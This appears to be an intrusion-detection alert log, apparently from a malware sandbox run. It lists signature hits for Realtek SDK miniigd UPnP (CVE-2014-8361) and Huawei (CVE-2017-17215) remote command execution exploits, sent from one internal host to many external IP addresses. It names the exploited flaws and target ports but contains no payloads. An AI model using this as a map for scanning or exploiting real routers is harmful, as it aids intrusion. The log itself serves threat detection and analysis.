                                                07/20/24-23:05:38.132424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614938052869192.168.2.1469.157.13.224
                                                07/20/24-23:05:47.513130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613628052869192.168.2.14191.198.16.14
                                                07/20/24-23:05:35.809155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4576452869192.168.2.1447.85.1.133
                                                07/20/24-23:06:18.910197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614480252869192.168.2.1432.193.142.20
                                                07/20/24-23:06:26.204720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4934052869192.168.2.14212.18.133.150
                                                07/20/24-23:05:34.644841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744237215192.168.2.14157.16.85.248
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.14157.114.15.111
                                                07/20/24-23:06:23.120505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3736252869192.168.2.14175.208.49.127
                                                07/20/24-23:05:57.797060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613534652869192.168.2.14148.117.182.60
                                                07/20/24-23:05:34.627949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071637215192.168.2.148.206.119.75
                                                07/20/24-23:06:06.813303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4787652869192.168.2.1466.1.85.90
                                                07/20/24-23:05:37.497829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5721452869192.168.2.14199.202.13.130
                                                07/20/24-23:05:45.175557TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615941452869192.168.2.148.108.202.123
                                                07/20/24-23:05:45.187333TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403652869192.168.2.1473.182.112.4
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369237215192.168.2.14157.98.9.197
                                                07/20/24-23:06:12.623995TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613564252869192.168.2.14114.59.223.176
                                                07/20/24-23:05:52.466707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25745852869192.168.2.14157.170.39.12
                                                07/20/24-23:05:57.198650TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613921052869192.168.2.14159.135.65.187
                                                07/20/24-23:06:16.252147TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613422652869192.168.2.1461.219.255.51
                                                07/20/24-23:05:37.475548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5548452869192.168.2.1434.90.248.232
                                                07/20/24-23:06:24.686159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143252869192.168.2.14128.195.98.38
                                                07/20/24-23:05:37.465013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24869252869192.168.2.14192.216.183.201
                                                07/20/24-23:05:37.497829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24171852869192.168.2.1427.21.93.45
                                                07/20/24-23:07:07.633025TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25630852869192.168.2.14120.21.248.106
                                                07/20/24-23:05:37.464931TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23770252869192.168.2.14203.171.109.95
                                                07/20/24-23:06:02.733116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4074252869192.168.2.14117.178.148.207
                                                07/20/24-23:05:58.334968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614323452869192.168.2.14164.43.30.66
                                                07/20/24-23:06:01.572805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3355452869192.168.2.14117.112.92.46
                                                07/20/24-23:05:59.972369TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614522652869192.168.2.14107.111.90.22
                                                07/20/24-23:06:09.557113TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25519052869192.168.2.1498.26.18.228
                                                07/20/24-23:06:11.420819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3616052869192.168.2.14219.116.120.228
                                                07/20/24-23:06:42.090394TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24962852869192.168.2.1449.124.39.191
                                                07/20/24-23:06:55.981552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4401052869192.168.2.14203.105.186.163
                                                07/20/24-23:05:56.997034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614551252869192.168.2.14132.82.133.46
                                                07/20/24-23:06:00.592911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3637452869192.168.2.14109.194.35.126
                                                07/20/24-23:06:12.712041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613953252869192.168.2.1466.78.27.114
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770637215192.168.2.14197.168.57.25
                                                07/20/24-23:05:52.544570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5196052869192.168.2.14137.251.110.201
                                                07/20/24-23:05:57.631218TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614187852869192.168.2.14212.79.198.77
                                                07/20/24-23:05:40.406154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24309052869192.168.2.14159.171.10.238
                                                07/20/24-23:05:34.625707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185037215192.168.2.14197.26.32.199
                                                07/20/24-23:05:36.306429TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614854052869192.168.2.1450.167.84.34
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159437215192.168.2.1441.57.89.122
                                                07/20/24-23:05:37.963175TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4442252869192.168.2.14125.180.243.83
                                                07/20/24-23:05:52.539655TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4380852869192.168.2.1434.35.146.155
                                                07/20/24-23:05:58.911568TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615902252869192.168.2.1478.187.239.16
                                                07/20/24-23:05:45.735784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5769252869192.168.2.1444.15.121.137
                                                07/20/24-23:05:57.617831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897852869192.168.2.14165.161.227.86
                                                07/20/24-23:05:36.532921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672237215192.168.2.14157.110.219.252
                                                07/20/24-23:05:58.772622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4730252869192.168.2.14212.119.81.31
                                                07/20/24-23:05:39.798839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614882052869192.168.2.14210.179.176.183
                                                07/20/24-23:05:57.791970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4809052869192.168.2.1498.41.122.243
                                                07/20/24-23:06:01.295861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4097252869192.168.2.14142.195.29.141
                                                07/20/24-23:06:15.027910TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5325652869192.168.2.14158.132.102.172
                                                07/20/24-23:05:36.526908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168837215192.168.2.1441.208.110.248
                                                07/20/24-23:05:46.755424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5566652869192.168.2.14184.34.105.168
                                                07/20/24-23:05:59.324002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4616452869192.168.2.1432.94.211.34
                                                07/20/24-23:05:36.327823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550037215192.168.2.1441.70.210.4
                                                07/20/24-23:05:59.692241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5395052869192.168.2.14146.28.213.74
                                                07/20/24-23:05:59.582686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5005052869192.168.2.14152.73.13.116
                                                07/20/24-23:05:37.458829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4584852869192.168.2.14157.63.164.204
                                                07/20/24-23:05:56.454514TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4197652869192.168.2.1490.200.1.246
                                                07/20/24-23:05:59.979529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5553652869192.168.2.14107.134.5.14
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922837215192.168.2.1447.141.173.62
                                                07/20/24-23:06:11.138961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4816452869192.168.2.14112.6.123.48
                                                07/20/24-23:05:58.930252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4718852869192.168.2.14110.237.107.43
                                                07/20/24-23:05:48.763322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034837215192.168.2.1441.109.217.191
                                                07/20/24-23:06:01.836795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4986852869192.168.2.1417.95.5.182
                                                07/20/24-23:05:59.845937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614939252869192.168.2.14125.143.14.140
                                                07/20/24-23:05:38.540965TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615379052869192.168.2.1434.179.222.192
                                                07/20/24-23:06:02.071790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613455852869192.168.2.14153.103.17.36
                                                07/20/24-23:07:06.736138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614012052869192.168.2.1485.57.174.44
                                                07/20/24-23:06:31.147829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24832652869192.168.2.1435.230.101.186
                                                07/20/24-23:05:42.257817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092437215192.168.2.1441.16.230.87
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513837215192.168.2.14157.221.219.70
                                                07/20/24-23:06:10.556359TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5622052869192.168.2.1476.6.203.77
                                                07/20/24-23:05:37.472705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3369452869192.168.2.1470.127.37.49
                                                07/20/24-23:05:36.313457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5419052869192.168.2.1412.94.49.225
                                                07/20/24-23:05:57.797833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615741852869192.168.2.14102.49.228.203
                                                07/20/24-23:05:50.537576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970837215192.168.2.1441.139.143.110
                                                07/20/24-23:05:57.149453TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538852869192.168.2.14148.242.100.157
                                                07/20/24-23:05:59.449442TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4289452869192.168.2.14161.224.19.168
                                                07/20/24-23:05:52.526128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24797052869192.168.2.14126.160.124.198
                                                07/20/24-23:05:57.958012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5778252869192.168.2.14172.65.163.145
                                                07/20/24-23:06:00.208694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23451052869192.168.2.141.109.211.216
                                                07/20/24-23:05:47.375806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5933452869192.168.2.1445.52.160.244
                                                07/20/24-23:05:48.800446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706837215192.168.2.14197.18.168.39
                                                07/20/24-23:05:57.139895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4789452869192.168.2.14164.70.124.204
                                                07/20/24-23:05:35.790631TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613650252869192.168.2.1443.119.39.158
                                                07/20/24-23:05:40.326250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24809452869192.168.2.1480.50.203.132
                                                07/20/24-23:05:47.086079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4691437215192.168.2.14157.89.60.239
                                                07/20/24-23:06:08.320378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4473252869192.168.2.1436.120.66.242
                                                07/20/24-23:06:02.405141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3349652869192.168.2.1412.222.33.202
                                                07/20/24-23:06:48.772924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4946852869192.168.2.14198.211.177.39
                                                07/20/24-23:05:39.672304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037837215192.168.2.1441.139.18.5
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056437215192.168.2.14169.144.75.68
                                                07/20/24-23:06:04.439088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25379852869192.168.2.14204.250.199.135
                                                07/20/24-23:05:37.449068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24694052869192.168.2.1496.209.69.20
                                                07/20/24-23:05:38.486141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631652869192.168.2.14101.65.28.197
                                                07/20/24-23:06:01.996850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613626052869192.168.2.14138.178.254.97
                                                07/20/24-23:05:58.627537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5927452869192.168.2.14129.194.94.79
                                                07/20/24-23:05:45.826893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613742652869192.168.2.14202.78.132.130
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440237215192.168.2.14197.198.24.196
                                                07/20/24-23:05:59.400252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615598852869192.168.2.14175.190.32.228
                                                07/20/24-23:05:37.542495TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24897452869192.168.2.14206.53.82.225
                                                07/20/24-23:05:59.057513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25298052869192.168.2.14174.132.14.103
                                                07/20/24-23:06:21.718589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4220852869192.168.2.14150.55.177.42
                                                07/20/24-23:05:35.853915TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614459452869192.168.2.14125.249.246.55
                                                07/20/24-23:05:57.159827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3695252869192.168.2.1492.72.166.156
                                                07/20/24-23:05:36.001304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3688052869192.168.2.14208.117.82.120
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543437215192.168.2.14157.239.179.90
                                                07/20/24-23:05:59.827265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23351252869192.168.2.14167.123.39.124
                                                07/20/24-23:06:11.328788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614464052869192.168.2.14210.105.148.37
                                                07/20/24-23:06:16.332122TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24795852869192.168.2.14164.153.241.195
                                                07/20/24-23:05:40.465472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25420452869192.168.2.14154.76.182.106
                                                07/20/24-23:05:46.374064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618652869192.168.2.1413.248.239.26
                                                07/20/24-23:05:57.036645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5360852869192.168.2.14161.171.80.80
                                                07/20/24-23:05:57.357839TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25673452869192.168.2.14103.108.73.218
                                                07/20/24-23:05:37.459218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3985252869192.168.2.14134.42.80.231
                                                07/20/24-23:05:38.771024TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614818452869192.168.2.1451.39.86.197
                                                07/20/24-23:05:44.686584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24535852869192.168.2.1459.125.137.153
                                                07/20/24-23:06:01.260147TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613504452869192.168.2.14122.77.226.22
                                                07/20/24-23:05:52.525575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24040052869192.168.2.1445.125.38.2
                                                07/20/24-23:06:48.642445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4083652869192.168.2.14171.33.218.139
                                                07/20/24-23:05:59.102064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3384652869192.168.2.1425.34.210.225
                                                07/20/24-23:06:08.698381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4142852869192.168.2.1457.168.132.3
                                                07/20/24-23:05:38.070646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615287252869192.168.2.14116.197.2.184
                                                07/20/24-23:05:52.485640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25798452869192.168.2.1420.184.51.228
                                                07/20/24-23:05:52.513067TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462052869192.168.2.14219.160.20.3
                                                07/20/24-23:05:57.188540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615447652869192.168.2.1414.148.136.80
                                                07/20/24-23:06:02.167111TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25353052869192.168.2.1488.174.31.158
                                                07/20/24-23:05:35.460621TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615163652869192.168.2.1464.61.239.79
                                                07/20/24-23:06:03.028397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3939852869192.168.2.1483.6.1.240
                                                07/20/24-23:05:58.395096TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4052452869192.168.2.14117.178.148.207
                                                07/20/24-23:05:59.061994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5501652869192.168.2.14140.182.198.151
                                                07/20/24-23:06:10.883252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4939252869192.168.2.14175.129.157.75
                                                07/20/24-23:06:14.413410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3609852869192.168.2.1412.103.243.28
                                                07/20/24-23:05:57.141104TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25391052869192.168.2.14213.67.142.255
                                                07/20/24-23:05:57.234632TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613410052869192.168.2.1463.95.38.63
                                                07/20/24-23:05:34.625708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788037215192.168.2.14157.162.164.93
                                                07/20/24-23:05:57.648686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5601252869192.168.2.14192.161.140.181
                                                07/20/24-23:06:03.170667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5767252869192.168.2.14145.15.157.98
                                                07/20/24-23:05:34.624854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658437215192.168.2.14221.229.167.177
                                                07/20/24-23:06:11.320571TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614628252869192.168.2.142.174.24.244
                                                07/20/24-23:06:12.617233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5164452869192.168.2.14196.194.6.236
                                                07/20/24-23:05:47.312437TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615199852869192.168.2.1449.158.117.14
                                                07/20/24-23:05:59.192985TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3967852869192.168.2.14211.66.122.221
                                                07/20/24-23:06:16.652415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613589252869192.168.2.14207.245.156.40
                                                07/20/24-23:06:14.553922TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615011852869192.168.2.14140.195.204.208
                                                07/20/24-23:05:39.747656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156237215192.168.2.14157.50.140.179
                                                07/20/24-23:05:57.558741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3416852869192.168.2.14114.51.118.233
                                                07/20/24-23:05:58.174966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615828852869192.168.2.1453.94.167.97
                                                07/20/24-23:05:59.205784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712452869192.168.2.14129.196.243.121
                                                07/20/24-23:06:01.927271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615448652869192.168.2.14160.75.130.165
                                                07/20/24-23:06:21.718589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4346252869192.168.2.1459.77.93.94
                                                07/20/24-23:05:46.414364TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615977052869192.168.2.1479.31.170.172
                                                07/20/24-23:05:52.442221TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24366452869192.168.2.1466.110.133.249
                                                07/20/24-23:06:14.645434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925052869192.168.2.14203.111.124.30
                                                07/20/24-23:05:39.947686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4634252869192.168.2.14194.209.238.48
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436637215192.168.2.14157.185.4.161
                                                07/20/24-23:05:57.797060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615264052869192.168.2.145.36.215.241
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132437215192.168.2.1441.14.1.112
                                                07/20/24-23:05:52.531088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26066452869192.168.2.1452.191.253.144
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718637215192.168.2.14157.145.195.153
                                                07/20/24-23:05:36.580139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425837215192.168.2.14157.35.171.1
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608037215192.168.2.14197.112.3.242
                                                07/20/24-23:06:30.428451TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4009452869192.168.2.14171.119.105.56
                                                07/20/24-23:05:57.037609TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615645452869192.168.2.14121.202.104.123
                                                07/20/24-23:05:36.574959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452037215192.168.2.14197.235.102.53
                                                07/20/24-23:05:57.002874TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614560452869192.168.2.1492.226.53.187
                                                07/20/24-23:07:15.422064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5878652869192.168.2.14175.185.115.85
                                                07/20/24-23:05:37.542495TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24944252869192.168.2.1465.119.53.40
                                                07/20/24-23:05:45.543285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615503052869192.168.2.1452.34.41.29
                                                07/20/24-23:05:52.515632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24109052869192.168.2.1498.131.72.180
                                                07/20/24-23:06:19.491493TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24849452869192.168.2.14168.176.14.101
                                                07/20/24-23:05:36.299648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3807452869192.168.2.1425.145.229.184
